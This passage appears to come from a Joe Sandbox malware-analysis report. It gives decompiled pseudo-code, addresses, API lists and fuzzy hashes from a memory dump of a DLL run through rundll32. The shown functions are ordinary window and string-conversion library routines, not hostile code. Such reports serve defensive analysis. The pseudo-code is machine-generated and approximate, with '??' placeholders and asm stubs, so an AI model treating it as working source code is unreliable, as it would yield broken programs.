				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100202AB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E10007B50(E10007AE5(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006C53();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E10007B50(E10007AE5(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                        0x100219dd
                                                                        0x100219e5
                                                                        0x100219e8
                                                                        0x100219f0
                                                                        0x100219f3
                                                                        0x100219f8
                                                                        0x10021a03
                                                                        0x10021a15
                                                                        0x10021a05
                                                                        0x10021a08
                                                                        0x10021a08
                                                                        0x10021a1b
                                                                        0x10021a1f
                                                                        0x10021a2b
                                                                        0x10021a33
                                                                        0x10021a35
                                                                        0x10021a35
                                                                        0x10021a33
                                                                        0x100219fa
                                                                        0x100219fa
                                                                        0x100219fa
                                                                        0x10021a44
                                                                        0x10021a4a
                                                                        0x10021aea
                                                                        0x10021af1
                                                                        0x10021af8
                                                                        0x10021b02
                                                                        0x10021a50
                                                                        0x10021a52
                                                                        0x10021a57
                                                                        0x10021a62
                                                                        0x10021a6b
                                                                        0x10021a6b
                                                                        0x10021a62
                                                                        0x10021a6f
                                                                        0x10021a76
                                                                        0x10021ab7
                                                                        0x10021ac6
                                                                        0x10021ad3
                                                                        0x10021a78
                                                                        0x10021a78
                                                                        0x10021a7f
                                                                        0x10021a81
                                                                        0x10021a81
                                                                        0x10021a91
                                                                        0x10021aa4
                                                                        0x10021aae
                                                                        0x10021aae
                                                                        0x10021a76
                                                                        0x10021b11
                                                                        0x10021b16
                                                                        0x10021b1c
                                                                        0x10021b23
                                                                        0x10021b26
                                                                        0x10021b2d
                                                                        0x10021b34
                                                                        0x10021b3b
                                                                        0x10021b42
                                                                        0x10021b47
                                                                        0x10021b4e
                                                                        0x10021b55
                                                                        0x10021b5d
                                                                        0x10021b5d
                                                                        0x10021b49
                                                                        0x10021b49
                                                                        0x10021b49
                                                                        0x10021b62
                                                                        0x10021b6e
                                                                        0x10021b76
                                                                        0x10021b76
                                                                        0x10021b64
                                                                        0x10021b64
                                                                        0x10021b64
                                                                        0x10021b8f

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                        • String ID:
                                                                        • API String ID: 808654186-0
                                                                        • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                        • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                        • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018081 Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E10018081(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x10042708);
				E10012514(__ebx, __edi, __esi);
				_t199 =  *0x1004f73c; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x10042704, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1004f73c = 2;
						}
					} else {
						 *0x1004f73c = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x1004f73c; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1004f724; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E1001A444(0,  *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if(__eflags != 0) {
									_push( *(_t192 - 0x28));
									E100107C8(0, _t183, _t186, __eflags);
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E1001A487(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if(__eflags != 0) {
									_push(_t183);
									E100107C8(0, _t183, _t186, __eflags);
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E10010B20(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10011C50(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E1001A487(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E100107B6( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10011C50(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E1001254F(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1004f734; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E10010B20(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									_t219 =  *(_t192 - 0x34);
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E100107C8(0, _t184, _t190, _t219);
									}
									_t220 =  *(_t192 - 0x38);
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E100107C8(0, _t184, _t190, _t220);
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E10010B20(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if(__eflags != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E100107B6(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(__eflags == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E100107B6(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}




























                                                                        0x10018081
                                                                        0x10018081
                                                                        0x10018083
                                                                        0x10018088
                                                                        0x1001808f
                                                                        0x10018095
                                                                        0x1001809b
                                                                        0x100180b0
                                                                        0x100180ba
                                                                        0x100180c0
                                                                        0x100180c3
                                                                        0x100180c5
                                                                        0x100180c5
                                                                        0x100180b2
                                                                        0x100180b2
                                                                        0x100180b2
                                                                        0x100180b0
                                                                        0x100180d2
                                                                        0x100180ef
                                                                        0x100180ef
                                                                        0x100180f7
                                                                        0x100182d9
                                                                        0x100182dc
                                                                        0x100182de
                                                                        0x100182e1
                                                                        0x100182e4
                                                                        0x100182e6
                                                                        0x100182eb
                                                                        0x100182eb
                                                                        0x100182ee
                                                                        0x100182f1
                                                                        0x100182f3
                                                                        0x100182f8
                                                                        0x100182f8
                                                                        0x100182fe
                                                                        0x10018304
                                                                        0x10018307
                                                                        0x1001830a
                                                                        0x10018313
                                                                        0x10018316
                                                                        0x10018422
                                                                        0x10018424
                                                                        0x10018424
                                                                        0x10018427
                                                                        0x10018429
                                                                        0x1001842c
                                                                        0x10018431
                                                                        0x10018432
                                                                        0x00000000
                                                                        0x10018432
                                                                        0x1001831c
                                                                        0x1001831d
                                                                        0x1001831e
                                                                        0x10018321
                                                                        0x10018322
                                                                        0x10018325
                                                                        0x10018326
                                                                        0x10018329
                                                                        0x1001832e
                                                                        0x10018331
                                                                        0x10018334
                                                                        0x10018336
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001834a
                                                                        0x1001834c
                                                                        0x1001834f
                                                                        0x10018351
                                                                        0x100183f9
                                                                        0x100183fc
                                                                        0x100183fc
                                                                        0x100183ff
                                                                        0x10018401
                                                                        0x10018402
                                                                        0x10018407
                                                                        0x00000000
                                                                        0x100183ff
                                                                        0x10018357
                                                                        0x10018360
                                                                        0x10018365
                                                                        0x10018368
                                                                        0x1001836a
                                                                        0x10018370
                                                                        0x10018375
                                                                        0x1001838a
                                                                        0x1001838e
                                                                        0x10018390
                                                                        0x100183b5
                                                                        0x100183c5
                                                                        0x100183cb
                                                                        0x100183ce
                                                                        0x100183d0
                                                                        0x100183d6
                                                                        0x100183d9
                                                                        0x100183df
                                                                        0x100183e0
                                                                        0x100183e1
                                                                        0x100183e4
                                                                        0x100183e7
                                                                        0x100183f3
                                                                        0x100183f5
                                                                        0x00000000
                                                                        0x100183f5
                                                                        0x00000000
                                                                        0x10018392
                                                                        0x1001839b
                                                                        0x1001839d
                                                                        0x1001839f
                                                                        0x100183d2
                                                                        0x100183d2
                                                                        0x00000000
                                                                        0x100183d2
                                                                        0x100183a6
                                                                        0x100183ab
                                                                        0x100183ae
                                                                        0x00000000
                                                                        0x100183ae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018105
                                                                        0x10018108
                                                                        0x1001830c
                                                                        0x1001830c
                                                                        0x10018434
                                                                        0x1001843c
                                                                        0x1001843c
                                                                        0x1001810e
                                                                        0x10018110
                                                                        0x10018113
                                                                        0x10018116
                                                                        0x1001811c
                                                                        0x1001811e
                                                                        0x10018123
                                                                        0x10018123
                                                                        0x10018147
                                                                        0x10018149
                                                                        0x1001814e
                                                                        0x00000000
                                                                        0x10018154
                                                                        0x10018154
                                                                        0x10018164
                                                                        0x10018169
                                                                        0x1001816e
                                                                        0x10018171
                                                                        0x10018195
                                                                        0x100181b3
                                                                        0x100181ca
                                                                        0x100182b6
                                                                        0x100182b6
                                                                        0x100182b9
                                                                        0x100182bb
                                                                        0x100182be
                                                                        0x100182c3
                                                                        0x100182c4
                                                                        0x100182c7
                                                                        0x100182c9
                                                                        0x100182cc
                                                                        0x100182d1
                                                                        0x100182d2
                                                                        0x00000000
                                                                        0x100182d2
                                                                        0x100181e2
                                                                        0x100181e4
                                                                        0x100181e9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100181f3
                                                                        0x10018222
                                                                        0x10018232
                                                                        0x10018237
                                                                        0x1001823c
                                                                        0x1001823f
                                                                        0x10018260
                                                                        0x10018263
                                                                        0x1001827d
                                                                        0x10018291
                                                                        0x10018293
                                                                        0x10018295
                                                                        0x10018296
                                                                        0x10018297
                                                                        0x1001829a
                                                                        0x100182a0
                                                                        0x100182a3
                                                                        0x1001829c
                                                                        0x1001829c
                                                                        0x1001829d
                                                                        0x1001829d
                                                                        0x100182b4
                                                                        0x100182b4
                                                                        0x00000000
                                                                        0x10018265
                                                                        0x10018269
                                                                        0x1001826f
                                                                        0x10018272
                                                                        0x10018274
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018276
                                                                        0x00000000
                                                                        0x10018276
                                                                        0x10018263
                                                                        0x100181f8
                                                                        0x10018217
                                                                        0x10018217
                                                                        0x00000000
                                                                        0x10018197
                                                                        0x1001819b
                                                                        0x100181a0
                                                                        0x100181a1
                                                                        0x100181a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100181ac
                                                                        0x00000000
                                                                        0x100181ac
                                                                        0x10018195
                                                                        0x1001814e
                                                                        0x100180f7
                                                                        0x100180d4
                                                                        0x100180d7
                                                                        0x100180da
                                                                        0x100180da
                                                                        0x100180dd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100180df
                                                                        0x100180e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100180e4
                                                                        0x00000000
                                                                        0x100180e4
                                                                        0x100180ec
                                                                        0x00000000

                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,00000100,10042704,00000001,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 100180A8
                                                                        • GetLastError.KERNEL32 ref: 100180BA
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,10012C1E,?,00000000,00000000,10042708,00000038,10012971,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018141
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,10012C1E,?,?,00000000), ref: 100181C2
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100181DC
                                                                        • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 10018217
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: String$ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1775797328-0
                                                                        • Opcode ID: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction ID: 011406151073c2933195e68419e397d46f3af982358df5fa752d459d02b2d26b
                                                                        • Opcode Fuzzy Hash: 2a0531d2a3256dac13ccc396c07934314eadd6156838d5e530a716c7ff313fc5
                                                                        • Instruction Fuzzy Hash: 3CB1467280025AEFDF12DFA0DC858DE7BB6FB09394F118229F910AA161D735DBA1DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001F2DE Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E1001F2DE(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E10011BF0(0x1003a3e8, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E100373B5();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E100373B5() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E1001EE1E(_t85);
					E10022196();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E100237EE();
					_t49 = E100220EE(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E1001F0D1(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E100202AB(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E10021B92(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E100204FE(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E1001EE58(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}
















                                                                        0x1001f2e3
                                                                        0x1001f2ed
                                                                        0x1001f2f2
                                                                        0x1001f2f6
                                                                        0x1001f2f9
                                                                        0x1001f2fc
                                                                        0x1001f2ff
                                                                        0x1001f308
                                                                        0x1001f30b
                                                                        0x1001f312
                                                                        0x1001f323
                                                                        0x1001f329
                                                                        0x1001f329
                                                                        0x1001f330
                                                                        0x1001f335
                                                                        0x1001f33b
                                                                        0x1001f33b
                                                                        0x1001f33f
                                                                        0x1001f350
                                                                        0x1001f353
                                                                        0x1001f358
                                                                        0x1001f35c
                                                                        0x1001f360
                                                                        0x1001f362
                                                                        0x1001f368
                                                                        0x1001f36b
                                                                        0x1001f370
                                                                        0x1001f376
                                                                        0x1001f378
                                                                        0x1001f37f
                                                                        0x1001f385
                                                                        0x1001f385
                                                                        0x1001f378
                                                                        0x1001f36b
                                                                        0x1001f38c
                                                                        0x1001f390
                                                                        0x1001f391
                                                                        0x1001f399
                                                                        0x1001f39e
                                                                        0x1001f39f
                                                                        0x1001f3a0
                                                                        0x1001f3a3
                                                                        0x1001f3aa
                                                                        0x1001f3ac
                                                                        0x1001f3ae
                                                                        0x1001f3b2
                                                                        0x1001f3b6
                                                                        0x1001f3b9
                                                                        0x1001f3be
                                                                        0x1001f3c1
                                                                        0x1001f3c5
                                                                        0x1001f3c5
                                                                        0x1001f3c9
                                                                        0x1001f3c9
                                                                        0x1001f3ce
                                                                        0x1001f3d1
                                                                        0x1001f3df
                                                                        0x1001f3df
                                                                        0x1001f3d1
                                                                        0x1001f400
                                                                        0x1001f404
                                                                        0x1001f407
                                                                        0x1001f40e
                                                                        0x1001f40e
                                                                        0x1001f414
                                                                        0x1001f417
                                                                        0x1001f41f
                                                                        0x1001f422
                                                                        0x1001f427
                                                                        0x1001f427
                                                                        0x1001f422
                                                                        0x1001f431
                                                                        0x1001f436
                                                                        0x1001f43b
                                                                        0x1001f43e
                                                                        0x1001f443
                                                                        0x1001f443
                                                                        0x1001f449
                                                                        0x1001f341
                                                                        0x1001f341
                                                                        0x1001f341
                                                                        0x1001f451
                                                                        0x1001f45a

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1001F2E3
                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F31B
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323
                                                                          • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
                                                                        • GetDesktopWindow.USER32 ref: 1001F362
                                                                        • IsWindowEnabled.USER32(00000000), ref: 1001F370
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 1001F37F
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 1001F40E
                                                                        • GetActiveWindow.USER32 ref: 1001F419
                                                                        • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                        • String ID:
                                                                        • API String ID: 833315621-0
                                                                        • Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                        • Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
                                                                        • Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                        • Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002583A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
